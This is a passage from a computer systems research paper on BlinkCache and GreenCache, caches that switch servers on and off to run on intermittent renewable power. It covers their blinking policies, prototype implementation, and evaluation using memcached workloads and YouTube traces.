‘Minimizing bandwidth cost,’ we describe how the chunk size is Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 22/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 10 YouTube trace related videos and switch time analysis. (A) Related video position analysis. (B) Video switching time analysis. Figure 11 GreenCache architecture. determined and how chunking a video can reduce the uplink bandwidth usage if used on a blinking multimedia cache cluster. GreenCache design Figure 11 depicts GreenCache’s architecture, which consists of a proxy and several cache servers. The proxy maintains a video→chunk mapping and a chunk→node mapping, Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 23/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 while also controlling chunk server placement and eviction. Clients, e.g., web browsers, connect to video servers through the proxy, which fetches the requisite data from one or more of its cache servers, if the data is resident in the cache. If the data is not resident, the proxy forwards the request to the host, i.e., backend server. The proxy stores metadata to access the cache in its own memory, while video chunks reside on stable storage on each cache server. Similar to BlinkCache, GreenCache also includes a power manager, that monitors available power and energy stored in a battery using hardware sensors, e.g., a voltage logger and current transducer. The power manager implements various blinking policies to control nodes’ active and inactive intervals to match the cache’s power usage to the available power. The power manager communicates with a power client running on each cache server to set the start time and active period every blink interval. The power client activates the node at the start time and deactivates the node after the active period every blink interval, and thus controls node-level power usage by transitioning the node between active and inactive states. As discussed earlier, the primary objective of a multimedia cache is to reduce buffering (or pause) time at clients and the bandwidth usage between the cache and origin servers. Next, we describe GreenCache’s techniques to both reduce bandwidth usage to the backend origin servers, while also minimizing buffering (or pause) time at the client. Minimizing bandwidth cost As Fig. 9 indicates, all videos are not equally popular. Instead, a small number of videos exhibit a significantly higher popularity than others. Similar to other multimedia caches, GreenCache has limited storage capacity, requiring it to evict older videos to cache new videos. An eviction strategy that minimizes the bandwidth usage each interval will evict the least popular videos during the next interval. However, such a strategy is only possible if the cache knows the popularity of each video in advance. To approximate a video’s future popularity, GreenCache maintains each video’s popularity as an exponentially-weighted moving average of a video’s accesses, updated every blink interval. The cache then evicts the least popular videos if it requires space to store new videos. As shown in Fig. 10B, most videos are not watched completely most of the time. In fact, the figure shows that users of YouTube watch less than 45% of the videos to completion. In addition, users might watch the last half of a popular video less often than the first half of an unpopular video. To account for discrepancies in the popularity of different segments of a video, GreenCache divides a video into multiple chunks, where each chunk’s playtime is equal in length to the blink interval. Similar to entire videos, GreenCache tracks chunk-level popularity as an exponentially weighted moving average of a chunk’s accesses. Formally, we can express the popularity of the ith chunk after the tth interval as: Popularityi t = αAi t + (1 − α)Popularityi t−1 . (1) Ai t represents the total number of accesses of the ith chunk in the tth interval, and α is a configurable parameter that weights the impact of past accesses. Further, GreenCache Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 24/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 manages videos at the chunk level, and evicts least popular chunks, from potentially different videos, to store a new chunk. As a result, GreenCache does not need to request chunks from the backend origin servers if the chunk is cached at one or more cache servers. Reducing buffering time As discussed earlier, blinking increases buffering time up to a blink interval, if the requested chunk is not present on an active server. The proxy could mask the buffering time from a client if the client receives a chunk before it has finished playing the previous chunk. Assuming sufficient energy and bandwidth, the proxy can get a cached chunk from a cache server within a blink interval, since all servers become active for a period during each blink interval. As a result, a user will not experience pauses or buffering while watching a video in sequence, since the proxy has enough time to send subsequent chunks (after the first chunk) either from the cache or the origin server before the previous chunk finishes playing, e.g., within a blink interval. However, the initial buffering time for the first chunk could be as long as an entire blink interval, since a request could arrive just after the cache server storing the first chunk becomes inactive. Thus, to reduce the initial buffering time for a video, the proxy replicates the first chunk of cached videos on all cache servers. However, replication alone does not reduce the buffering time if all servers blink synchronously, i.e., become active at the same time every blink interval. As a result, as discussed next, GreenCache employs a staggered load-proportional blinking policy to maximize the probability of at least one cache server being active at any power level. Staggered load-proportional blinking As discussed above, we replicate the first chunk of each cached video on all cache servers in order to reduce initial buffering time. To minimize the overlap in node active intervals and maximize the probability of at least one active node at all power levels, GreenCache staggers start times of all nodes across each blink interval. Thus, every blink interval, e.g., 60 s, each server is active for a different period of time, as well as a different duration (discussed below). At any instant, a different set of servers (and their cached data) is available for clients. Since at low power the proxy might not be able to buffer all subsequent chunks from blinking nodes, clients might face delays or buffering while watching videos (after initially starting them). To reduce the intermediate buffering for popular videos, GreenCache also groups popular chunks together and assigns more power to nodes storing popular chunks than nodes storing unpopular chunks. Thus, nodes storing popular chunks are active for a longer duration each blink interval. GreenCache ranks all servers from 1...N , with 1 being the most popular and N being the least popular node. The proxy monitors chunk popularity and migrates chunks to servers in rank order. Furthermore, the proxy distributes the available power to nodes in proportion to the aggregate popularity of their chunks. Formally, active period for the ith node, assuming negligible power for inactive state, could be expressed as Activei = BI ∗ P ∗ Popularityi MP ∗ n k=1 Popularityi . (2) Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 25/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 12 Staggered load-proportional blinking. BI represents the length of a blink interval, Popularityi represents the aggregate popularity of all chunks mapped on the ith node, P denotes the available power, and MP is the maximum power required by an active node. Additionally, start times of nodes are staggered in a way that minimizes the unavailability of first chunks, i.e., minimizes the period when none of the nodes are active, every blink interval. Figure 12 depicts an example of staggered load-proportional blinking for five nodes. Note that since the staggered load-proportional policy assigns active intervals in proportion to servers’ popularity, it does not create an unbalanced load on the cache servers. Prefetching recommended videos Most popular video sites display a recommended list of videos to users. For instance, YouTube recommends a list of twenty videos which generally depends on the current video being watched, the user’s location, and other factors including past viewing history. The trace analysis of YouTube videos, as discussed above, indicates that users tend to select the next video from recommended videos ∼45% of the time. In addition, a user selects a video at the top more often than a video further down in the recommended list. In fact, Fig. 10A shows that nearly 55% of the time a user selects the next video from top five videos in the recommended list. To further reduce initial buffering time the proxy prefetches the first chunk of top five videos in the recommended list, if these chunks are not already present in the cache. The proxy fetches subsequent chunks of the video when the user requests the video next. IMPLEMENTATION We use the Blink’s hardware and software prototype from ‘Blink Prototype’ to experiment with BlinkCache and GreenCache. We use the low-power server cluster of XO mother- boards for BlinkCache, and that of Mac minis for GreenCache. BlinkCache implementation We run an unmodified memcached server and an instance of Blink’s power client on each BlinkCache node. We also wrote a memcached client workload generator to issue Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 26/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 key requests at a configurable but steady rate according to either a Zipf popularity distribution, parameterized by α, or a uniform popularity distribution. As in a typical application, the workload generator fetches any data not resident in the cache from a MySQL database and places it in the cache. Since we assume the MySQL server provides always-available persistent storage, it runs off the power grid and not variable power. We modify magent, a publicly available memcached proxy (http://code.google.com/ p/memagent/), to implement the design alternatives in the previous section, including table-based key mapping and popularity-based key migration. Our modifications are not complex: we added or changed only 300 lines of code to implement all of the BlinkCache design variants from ‘Blink Prototype.’ Since all requests pass through the proxy, it is able to monitor key popularity. The proxy controls blinking by interacting with Blink’s power manager, which in our setup runs on the same node, to monitor the available power and battery level and set per-node blinking patterns. We also use the proxy for experiments with memcached’s default hash-based key mappings, rather than modifying the memcached client. Since our always-on proxy is also subject to intermittent power constraints, we run it on a low-power (5 W) embedded SheevaPlug with a 1.2 GHz ARM CPU and 512 MB of memory. GreenCache implementation As discussed in ‘GreenCache: Blinking Multimedia Cache,’ we study the GreenCache’s design in the context of a cellular tower powered by solar and wind energy. In our prototype we use a WiMAX base station to emulate the cellular tower. To analyze the blinking performance of GreenCache, we implement a GreenCache prototype in Java, including a proxy (∼1,500 LOC), cache server (∼500 LOC), power manager (∼200 LOC), and power client (∼150 LOC). Mobile clients connect to the Internet through a wireless base station, such as a cell tower or WiMAX base station, which is configured to route all multimedia requests to the proxy. While the power manager and proxy are functionally separate and communicate via well-defined APIs, our prototype run both modules on the same node. Our prototype does not require any modification in the base station or mobile clients. Both cache server and power client run together on each blinking node. Our prototype includes a full implementation of GreenCache, including the staggered load-proportional blinking policy, load-proportional chunk layout, prefetching, video chunking, chunk eviction and chunk migration. The proxy uses a Java Hashtable to map videos to chunks and their locations, e.g., via their IP address, and maintains their status, e.g., present or evicted. Since our prototype has a modular implementation, we are able to experiment with other blinking policies and chunk layouts. We implement the activation and proportional policies similar to the memcached application as described in ‘BlinkCache: Blinking Memcached’ and compare with GreenCache’s staggered load- proportional policy. We also implement a randomized chunk layout and the Least Recently Used (LRU) cache eviction policy to compare with the proposed load-proportional layout and popularity based eviction policy, respectively. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 27/50 https://peerj.com/computer-science/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://code.google.com/p/memagent/ http://dx.doi.org/10.7717/peerj-cs.34 As discussed in ‘Blink Prototype,’ we use a cluster of ten Mac minis for GreenCache. We use one Mac mini to run the proxy and power manager, whereas we run a cache server and power client on other Mac minis. The proxy connects to a WiMAX base station (NEC Rel.1 802.16eBS) through the switch. We use a Linux laptop with a Teletonika USB WiMAX modem to run as a client. We also use a separate server to emulate multiple WiMAX clients. Our emulator limits the wireless bandwidth, in the same way as observed by the WiMAX card, and plays the YouTube trace described below. The WiMAX base station is operational and located on the roof of a tall building on the UMass campus. However, the station is currently dedicated for research purposes and is not open to the general public. Since GreenCache requires one node, running the proxy and power manager, the switch, and WiMAX base station to be active all the time, its minimum power consumption is 46 W, or 17% of its maximum power consumption. To experiment with a wide range of video traffic, we wrote a mobile client emulator in Java, which replays YouTube traces. For each video request in the trace file, the emulator creates a new thread at the specified time to play the video as per the specified duration. In addition, the emulator also generates synthetic video requests based on various configurable settings, such as available bandwidth, popularity distribution of videos, e.g., a Zipf parameter, viewing length distribution, and recommended list distribution. Blink emulator To study how the BlinkCache and GreenCache design scales with the cluster size we write an emulator that emulates a server cluster. The emulator takes the number of servers, servers’ parameters (e.g., RAM, IP Address, Port), network bandwidth, and the application name as input parameters, and starts as many processes as the number of servers. Each process emulates a node in the cluster, and applications running on that node are started in separate threads in the process. For example, a blinking node in BlinkCache is emulated by a process with two threads—one thread runs a power client while the other runs a memcached server. The power manager takes the power trace from our field deployment and scales up the trace to bring the average power at 50% of the power necessary to run all nodes concurrently. To emulate blinking of a node the power client sends the process to the sleep state and active state as directed by the power manager. We run our Blink emulator on a Mac mini running Linux kernel 2.6.38 with 2.4 GHz Intel Core 2 Duo processor and 8 GB of RAM. The emulator starts up to 1,000 processes to emulate 1,000 blinking nodes. We use benchmark results from our low-power server cluster to set application-level configuration parameters, such as request rate, access latency, transition latency, power consumption, zipf parameter, servers to proxy ratio etc., for applications running on the Blink emulator. As in our real cluster all modules and applications communicate over TCP/IP. Further, to run a memcached server in a thread, rather than in a process, we write a small memcached emulator that emulates basic operations (single-key get and put) of Memcached with similar latencies as observed with a real memcached server in our evaluation (‘Evaluation’). Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 28/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Power signal We program our power supplies to replay solar and wind traces from our field deployment of solar panels and wind turbines. We also experiment with both multiple steady and oscillating power levels as a percentage, where 0% oscillation holds power steady throughout the experiment and N % oscillation varies power between (45 + 0.45N )% and (45 − 0.45N )% every five minutes. We combine traces from our solar/wind deployment, and set a minimum power level equal to the power necessary to operate the always-active components. We compress our renewable power signal to execute three days in three hours, and scale the average power to 50% of the cluster’s maximum power. EVALUATION We evaluate BlinkCache and GreenCache on our small-scale Blink prototype from ‘Blink Prototype’. The purpose of our evaluation is not to maximize the performance of a particular deployment of our applications—memcached and multimedia cache—or improve on the performance of the custom deployments common in industry. Instead, our goal is to explore the effects of churn on the applications caused by power fluctuations for different design alternatives. Our results will differ across platforms according to the specific blink interval, CPU speed, and network latency and bandwidth of the servers and the network. Since our prototype uses low-power CPUs and motherboards, the request latencies we observe in our prototype are not representative of those found in high performance servers. BlinkCache evaluation We first use our workload generator to benchmark the performance of each blinking policy for both Zipf-like and uniform popularity distributions at multiple power levels with varying levels of oscillation. We then demonstrate the performance for an example web application—tag clouds in GlassFish—using realistic traces from our energy harvesting deployment that have varying power and oscillation levels. Unless otherwise noted, in our experiments, we use moderate-size objects of 10 KB, Facebook-like Zipf α values of 0.6, and memcached’s consistent hashing mapping function. Each experiment represents a half-hour trace, we configure each memcached server with a 100 MB cache to provide an aggregate cache size of 1 GB, and we use our programmable power supply to drive each power trace. Since each node has only 256 MB of memory, we scale our workloads appropriately for evaluation. Benchmarks We measure the maximum power of each node, at 100% CPU and network utilization, in S0 to be 8.6 W and its minimum power in S3 to be 0.2 W. We use these values in the proxy to compute the length of active and inactive periods to cap power consumption at a specific level. We also measure the impact of our node’s near 2 s transition latency for blink intervals T between 10 s and 2 min. Figure 13 shows the results for a duty cycle of 50%. In this case, the blinking interval must be over 40 s before average power over the interval falls below 55% of the node’s maximum power, as we expect. The result shows that on-demand Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 29/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 13 The near 2 s latency to transition into and out of S3 in our prototype discourages blinking intervals shorter than roughly 40 s. With a 50% duty cycle we expect to operate at 50% full power, but with a blink interval of less than 10 s we operate near 100% full power. transitions that occur whenever work arrives or departs are not practical in our prototype. Further, even blinking intervals as high as 10 s impose significant power inefficiencies. As a result, we use a blinking interval of 60 s for our experiments. Our 60 s blink interval is due solely to limitations in the Blink prototype. Note that there is an opportunity to significantly reduce blink intervals through both hardware and software optimizations. Since server clusters do not typically leverage ACPI’s S3 state, there has been little incentive to optimize its transition latency. Next, we determine a baseline workload intensity for memcached, since, for certain request rates and key sizes, the proxy or the switch becomes a bottleneck. In our experiments, we use a steady request rate (1,000 get requests/s) that is less than the maximum request rate possible once the proxy or switch becomes a bottleneck. Note that our results, which focus on hit rates, are a function of the popularity of objects rather than the distribution of request inter-arrival times. Our goal is to evaluate how blinking affects the relative hit rates between the policies, and not the performance limitations of our particular set of low-power components. Figure 14 demonstrates the maximum performance, in terms of total throughput and request latency for different key values sizes, of an unmodified memcached server, our memcached proxy, and a MySQL server. As expected, the memcached server provides an order of magnitude higher throughput and lower request latency than MySQL. Further, our proxy implementation imposes only a modest overhead to both throughput and latency, although the latency impact of proxy-based redirections will be greater on faster CPUs since less relative request time is spent in the OS and network. Our subsequent experiments focus on request hit rates rather than request latencies, since latencies vary significantly across platforms and workloads. Further, the wide disparity in latency between serving a request from memory and serving it from disk would show a larger, and potentially unfair, advantage for a blinking Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 30/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 14 Maximum throughput (A) and latency (B) for a dedicated memcached server, our mem- cached proxy, and a MySQL server. Our proxy imposes only a modest overhead compared with a dedicated memcached server. (A) Throughput. (B) Latency. system. Thus, we consider hit rate a better metric than latency for evaluating a blinking memcached instance. Activation blinking and thrashing An activation policy for an unmodified version of memcached must choose whether or not to alter the hash-based mapping function as it activates and deactivates servers. For constant power, a dynamic mapping function that always reflects the currently active set of servers should provides the best hit rate, regardless of the popularity distribution, since applications will be able to insert the most popular keys on one of the active servers. Figure 15A demonstrates this point for a workload with a Zipf popularity distribution (α = 0.6), and shows the hit rates for both static and dynamic activation variants at multiple constant power levels. While at high power levels the approaches have similar hit rates, as power level decreases, we see that the static variant incurs a higher penalty under constant power. However, Fig. 15B demonstrates that the opposite is true for highly variable power. The figure reports hit rates for different levels of power oscillation, where the average power for each experiment is 45% of the power necessary to run all nodes concurrently. The x-axis indicates oscillation level as a percentage, such that 0% oscillation holds power steady throughout the experiment and N % oscillation varies power between (45 + 0.45N)% and (45 − 0.45N)% every 5 min. We see that dynamic changes in the active server set of memcached’s hash-based mapping function incur an invalidation penalty. Since the invalidation penalty does not occur when memcached does not change the mapping function, the static variant provides a significantly better hit rate as the oscillations increase. Although not shown here, the difference with the original modulo approach is much greater, since each change flushes nearly the entire cache. The hash-based mapping function forces a choice between performing well under constant power or performing well under variable power. A table-based approach that uses our proxy to explicitly map keys to servers and uses key migration to increase the priority of popular keys performs better in both scenarios. That is, the approach does not incur invalidation penalties under continuously variable power, or result in low hit rates under constant power, as also shown in Figs. 15A and 15B. Note Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 31/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 15 Hit rate with activation policy under constant and oscillating power for a Zipf popularity distribution. (A) Constant power. (B) Variable power. Figure 16 Comparison of fairness and hit rate with synchronous policy and activation policy for a uniform popularity distribution. (A) Standard deviation with constant power. (B) Hit rate with constant power. that oscillation has no impact on other policies, e.g., those using key migration or the synchronous policy. Synchronous blinking and fairness While the activation policy with key migration results in the highest hit rate overall, it is unfair when many servers store equally popular objects since the policy must choose some subset of equally popular servers to deactivate. Figure 16A quantifies the fairness of the dynamic activation policy, the activation policy with key migration, and the synchronous policy, as a function of standard deviation in average per-object latency, at multiple constant power levels for a uniform popularity distribution where all objects are equally popular. Note that for distributions where all objects are equally popular, key migration is not necessary and is equivalent to using the static variant of hash-based mapping. The synchronous policy is roughly 2X more fair than the activation policy with key migration at all power levels. While the dynamic hash-based mapping is nearly as fair as the synchronous policy, it has a worse hit rate, especially in high-power scenarios, as shown in Fig. 16B. Thus, the synchronous policy, which is more fair and provides lower average latency, is a better choice than any variant of the activation policy for uniform popularity Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 32/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 17 Comparison of fairness and hit rate with load proportional policy, synchronous policy and activation policy for a Zipf popularity distribution. (A) Standard deviation with constant power. (B) Hit rate with constant power. distributions. Note that the key popularity distribution across servers in every memcached cluster that uses a hash-based mapping function is uniform, since keys map to servers randomly. Thus, the synchronous policy is the best choice for a heavily-loaded memcached cluster that cannot tolerate the throughput penalty of using proxies. Balancing performance and fairness Activation with key migration results in the maximum hit rate for skewed popularity distributions where some objects are significantly more popular than others, while the synchronous policy results in the best overall performance, in terms of both hit rate and fairness, for uniform popularity distributions. The proportional policy combines the advantages of both and works well for Zipf-like distributions with a few popular objects but a long tail of similarly (un)popular objects, since the long heavy tail in isolation is similar to the uniform distribution. Figure 17B shows the hit rate for the proportional policy, the activation policy with migration, and the synchronous policy for a Zipf popularity distribution with α = 0.6 at different power levels. The synchronous policy performs poorly, especially at low power levels, in this experiment, since it does not treat popular objects different than unpopular objects. However, the proportional policy attains nearly the same hit rate as the activation policy at high power levels, since it also prioritizes popular objects over unpopular objects. Even at low power levels its hit rate is over 60% of the activation policy’s hit rate. Further, the proportional policy is significantly more fair to the many unpopular objects in the distribution. Figure 17A reports fairness, in terms of the standard deviation in per-object latency, at different power levels for the unpopular keys, i.e., keys ranked in the bottom 80th percentile of the distribution. The activation policy’s unfairness is nearly 4X worse at low power levels. Thus, the proportional policy strikes a balance between performance and fairness when compared against both the synchronous and activation policies. Finally, Fig. 18 shows how the S3 transition overhead affects our results at a moderate power level. The figure shows that the overhead has only a modest effect on the load-proportional policy’s hit rate. The overhead does not affect the relative fairness of the policies. Note that all of our previous experiments use our prototype’s 2 s transition Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 33/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 18 As S3 transition overhead increases, the hit rate from the load-proportional policy de- creases relative to the activation policy with key migration for a Zipf distribution at a moderate power level. overhead. A shorter transition overhead would improve our results, and even a longer transition would show some, albeit lesser, benefits. Case study: tag clouds in glassfish While our prior experiments compare our blinking policies for different power and oscillation levels, we also conduct an application case study using traces from our energy harvesting deployment. The experiment provides a glimpse of the performance tradeoffs for realistic power signals. GlassFish is an open source Java application server from Sun, which includes a simple example application that reuses parts of the Java PetStore multi-tier web application, used in prior research, e.g., Cohen et al. (2004), to create tag clouds for pets. Tag clouds are a set of weighted tags that visually represent the most popular words on a web page. We modify the default web application to generate HTML for per-user tag cloud pages and cache them in memcached. The data to construct each HTML page comes from a series of 20 sequential requests to a MySQL database. For these experiments, we measure the latency to load user tag cloud pages, which incorporates MySQL and HTML regeneration latencies whenever HTML pages are not resident in the cache. The MySQL latency for our simple table-based data is typically 30 ms per database query. While page load latency follows the same trend as hit rate, it provides a better application-level view of the impact of different policies. Figure 19B shows the average latency to load user web pages across 40,000 users for our three different policies—activation with key migration, proportional, and synchronous—for a combined solar and wind trace, assuming the popularity of each user’s tag cloud page follows a Zipf distribution with α = 0.6. We derive the power signal, shown in Fig. 19A, by compressing a 3-day energy harvesting trace to 3 h. As expected, the activation policy with key migration and the load-proportional policy exhibit comparable page load latencies at most points in the trace. For this trace, the Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 34/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 19 Power signal from a combined wind/solar deployment (A) and average page load latency for that power signal (B). (A) Power. (B) Page Load Latency. load-proportional policy is within 15% of the activation policy’s hit rate. The activation policy is slightly better at low energy levels, since it tends to strictly ensure that more popular content is always cached. Also as expected, the synchronous policy tends to perform poorly across all power levels. Also as expected, we measure the standard deviation of page load latencies for the load-proportional policy to be within 2% to the synchronous policy for the vast majority, i.e., bottom 80%, of the equally unpopular objects. BlinkCache scalability To see how our BlinkCache design performs for a large server cluster we use the Blink em- ulator from ‘Implementation’ to emulate a cluster of 1,000 nodes. We use the benchmark results from above to set the throughput, access latency, and power consumption of servers. As described above, each proxy can serve 10 memcached servers and give a maximum throughput of 1,000 requests/s. So, assuming the same throughput per proxy we select 100 proxies for our 1,000 node cluster which can give an aggregate maximum throughput of 100,000 requests/s. We use the same memcached client and request trace that we used for the evaluation of our real cluster. As the number of proxies depend on the total number of active servers the activation policy activates/deactivates a number of proxies as it varies the number of active servers. To avoid migration of the key→server mappings from an inactive proxy to active ones we store all key→server mappings on each proxy. As each mapping requires only 20 bytes the overhead of storing all is minimal. A memcached client uses a simple mapping function—Hash(Key)%NumberProxies—to map a key to one of the proxies. If the number of active proxies changes a key previously mapped to a proxy might now map to a different proxy, which might not have the correct key→server mapping for that key. So, to reduce the overhead we sync the hash table (key→server mappings) of active proxies whenever their count changes. First we evaluate the maximum throughput of the cluster at different power levels. As shown in Fig. 20 the maximum throughput increases linearly with the available power which dictates the maximum number of active nodes. Next, we evaluate the performance of aforementioned blinking policies—Activation with key migration, Synchronous, Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 35/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 20 Throughput of a 1,000 node cluster with each node having the maximum throughput of 1,000 req/s. Load-proportional with key migration—at various steady and oscillating power levels. Comparing Fig. 21A with Fig. 17B it becomes clear that the performance (or relative performance) of different blinking policies does not vary much (within ±20%) with the cluster size. Further, the load-proportional policy performs better than the activation policy at high power for a large cluster, in construct to a small cluster of 10 nodes, as the key migration overhead dominates the performance gain due to keeping the popular keys on always-active servers for a large cluster at high power. But, like a small cluster, the performance gain dominates the migration overhead for the activation policy at low to medium power even for a large cluster. Figure 21B shows the hit rate for these three blinking policies for different oscillation levels from the 45% of full power. As expected, the hit rate for the activation policy drops down when the oscillation level increases because the migration overhead increases with the oscillation level. But, for the synchronous and load-proportional policies the hit rate remains the same at all oscillation levels because they don’t incur any migration overhead. GreenCache evaluation We first benchmark GreenCache’s proxy and chunking overhead for our prototype. We then evaluate GreenCache’s performance for real-world YouTube traces at multiple power levels with varying levels of oscillation. We then demonstrate the performance using realistic power traces from our energy harvesting deployment that have varying power and oscillation levels. We use two metrics to measure the performance: (1) bandwidth usage between the cache and YouTube servers and (2) average buffering or pause time at the clients. Bandwidth usage denotes the total data received from backend servers over a given time interval; it also represents bandwidth cost that mobile operators must pay to Internet service providers. One primary objective of GreenCache is to reduce this bandwidth usage. Another key objective of GreenCache is to improve user’s viewing Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 36/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 21 Comparison of hit rate with load-proportional policy, synchronous policy and activation policy for a Zipf popularity distribution. (A) Steady power. (B) Oscillating power. experiences. Therefore, we consider average buffering time per video as our second metric to measure the performance. Note that our implementation tries to optimize both metrics independent of each other. However, optimizing for bandwidth usage does not depend on the power level, but on the total cache size, while optimizing for buffering time depends on both the cache size and the power level. Benchmarks To measure the proxy’s overhead, our client emulator creates a single thread and sends multiple video requests in succession. The breakdown of the latency overhead at each component for a sample 1 MB video chunk of 1 min play length, assuming a 135 Kbps bit rate, is 30 ms at the proxy, 20 ms at the cache server, 50 ms in the network between the proxy and cache server, and 100 ms in the network between the proxy and client. The result demonstrates that the proxy’s latency overhead is low. We also benchmark average buffering time for different blink intervals at various power levels. Table 5 shows the standard deviation, 90th percentile, and average buffering time for video requests, as the blink interval and power levels change. As expected, the buffering time increases with the blink interval at low to moderate power levels. We also benchmark the standard deviation, 90th percentile, and average buffering time for requests going to YouTube servers, which are as 150 ms, 570 ms, and 620 ms, respectively. To study the performance of our prototype cache for different cache sizes and power levels we take a 3 h trace (from 7 PM to 10 PM on February 7th, 2012) from our 3 day YouTube trace. The trace contains a total of 8,815 requests, for 6,952 unique videos, over the 3 h interval. Our trace reports the URL, video ID, client IP address, and request time for each video. In addition, we pull the recommended list for each video in the trace from the YouTube servers. Based on the video ID, its recommended list, client IP address, and the next requested video ID, we calculate the viewing length for each video. We assume the average video length as 5 min and the streaming rate as 135 Kbps. Also, we fix the downlink bandwidth from backend YouTube servers to the WiMAX station to 1 Mbps, and the storage capacity of each cache server as 1 GB. Further, we fix the blink interval as 60 s. We use a weighing factor of 0.6 for the proposed popularity-aware eviction policy. Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 37/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Table 5 Standard deviation, 90th percentile, and average buffering time at different power levels and blink intervals. Buffering time (s) Power (%) ⇓ 20 40 60 80 100 Blink interval = 30 s Std Dev 7.88 5.33 3 0.52 0.03 90th per 21.25 15.25 9.25 2.25 0.23 Avg. 10.99 6.12 3.88 2.35 0.25 Blink interval = 60 s Std Dev 14.59 10.01 6.79 2.55 0.03 90th per 41.25 28.25 19.25 7.45 0.23 Avg. 20.58 10.19 6.94 3.36 0.25 Blink interval = 90 s Std Dev 24.79 16.69 10.06 3.16 0.03 90th per 66.25 43.25 25.65 4.25 0.23 Avg. 29.44 15.12 8.50 3.22 0.25 Blink interval = 120 s Std Dev 30.52 22.21 13.13 5.29 0.03 90th per 78.25 59.45 31.45 14.45 0.23 Avg. 32.73 21.58 9.81 4.58 0.25 First, we study the performance—bandwidth usage and buffering or pause time for clients—for different number of cache servers at full power for the real world 3 h YouTube trace, as well as a synthetic trace of 8,815 requests where each request is for a randomly chosen video from the aforementioned 6,952 unique videos. In addition, we choose least-recently-used (LRU) cache eviction policy for this experiment; further, videos are not chunked. Figure 22 plots the total bandwidth usage and average buffering time for both random and real traces. We also plot the optimal performance for real traces assuming we know all requests in advance. The optimal policy always keeps most popular videos in the cache, and never evicts a popular video to store a less popular video (over a given interval). As expected, the total bandwidth usage and average buffering time over the 3 h interval decreases as the size or number of servers increases. Next, to study the benefits of video chunking we measure the performance of three different cache eviction policies—LRU, popularity-aware, and optimal—for the 3 h real trace at full power and 9 cache servers. Figure 23 shows that the performance of GreenCache’s popularity-aware eviction policy is better (∼7%) than that of LRU. Further, video chunking improves (>15%) the performance of all policies as it avoids storing unpopular chunks of popular videos. In all cases, LRU performs worse than others, which motivates our use of a popularity-aware cache eviction policy and video chunking for all further experiments. Staggered load-proportional blinking As discussed earlier, the total bandwidth usage over a fixed interval, as long as a request does not go to backend servers for an already cached video, does not depend on the Sharma et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.34 38/50 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.34 Figure 22 Both bandwidth usage and buffering time reduce with increasing cache size. (A) Bandwidth usage. (B) Buffering time. Figure 23 Video chunking reduces both bandwidth usage and buffering time. (A) Bandwidth usage. (B) Buffering time. available power level or blinking and layout policies; it only depends on the cache size and eviction policies. However, buffering time and users’ experiences do depend on the available power, blinking and layout policies. In this section, we study the effects of the power level on the average buffering time, and various optimizations designed to reduce the buffering time. We use the same 3 h real YouTube trace, as discussed above, and 9 cache servers for all further experiments. Further, we use video chunking and the popularity-aware eviction policy for all experiments. To compare the proposed staggered load-proportional policy with the activa- tion and load-proportional policies, we also implement an activation policy and a load-proportional policy for GreenCache, and integrate them with GreenCache’s popularity-aware eviction policy, video chunking, and popularity-aware migration policy. The activation policy activates or deactivates 